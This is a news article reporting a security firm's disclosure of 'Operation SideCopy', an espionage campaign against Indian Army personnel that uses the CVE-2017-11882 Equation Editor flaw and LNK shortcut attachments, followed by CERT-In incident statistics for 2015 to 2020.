Cybersecurity solutions provider Quick Heal revealed evidence of a cyber espionage campaign “Operation SideCopy” by an advanced persistent threat (APT) group targeting Indian Army personnel since 2019 to pilfer sensitive information. The team at Seqrite, Quick Heal’s Enterpise Security brand, related certain old campaigns and attacks in the past year to the Operation SideCopy group by common IOCs (Indicator of compromises).
Exploiting Equation Editor Flaw
Seqrite observed three infection chain processes in which attackers exploited equation editor vulnerability (CVE-2017-11882) as the initial infection vector. The attackers distributed malware embedded in an email attachment in the form of a ZIP file containing a LNK file or a DOC file.
“The victim receives LNK files, compressed into ZIP/RAR via emails. These files are shortcuts executing mshta.exe and providing remote HTA URL as the parameter. LNKs have a double extension with document icons, to trick the victim into opening the file. Victims just have to execute LNK files and rest all modules follow in the background,” Seqrite stated.
Key Findings
- This cyber-operation targets only the Indian defense forces and armed forces personnel.
- Malware modules seen are constantly under development and updated modules are released after a reconnaissance of victim data.
- Actors are keeping track of malware detections and updating modules when detected by AV.
- Almost all CnC belongs to Contabo GmbH and server names are similar to machine names found in the Transparent Tribe report.
- This threat actor is misleading the security community by copying TTPs that point at Sidewinder APT group.
- We suspect this threat actor has links with Transparent Tribe APT group.
Growing Cyberattacks on Indians
Recently, the Computer Emergency and Response Team – India (CERT-In) stated that it recorded over 1.45 million cybersecurity incidents including breaches and hacks between 2015 and 2020. According to the India’s Ministry of Electronics and Information Technology (MeITY), Cert-In reported 49,455, 50,362, 53,117, 208,456, 394,499 and 696,938 cybersecurity incidents during the year 2015, 2016, 2017, 2018, 2019 and 2020 (till August) respectively. The figures were out after the ministry was asked about growing cyberattacks targeting Indian citizens as well as commercial and legal entities.